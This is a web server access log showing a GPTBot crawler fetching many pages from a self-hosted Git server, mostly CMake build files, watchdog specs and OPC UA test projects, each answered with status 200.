"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument" [Client 74.7.227.38] [Length 17017] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:15:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7789] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" +[17/Feb/2026:15:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2findex.html.good2" [Client 74.7.227.38] [Length 22130] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:15:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final.spec" [Client 74.7.227.38] [Length 21779] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:15:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:15:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10260] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:15:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:15:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12223] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12254] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:15:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main" [Client 74.7.227.38] [Length 17180] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/branches" +[17/Feb/2026:15:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main" [Client 74.7.227.38] [Length 5773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/branches" +[17/Feb/2026:15:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10263] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24287] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24262] [Gzip 9.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10287] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10285] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 24426] [Gzip 15.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:15:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24287] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9942] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26855] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26860] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26832] [Gzip 20.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11313] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] 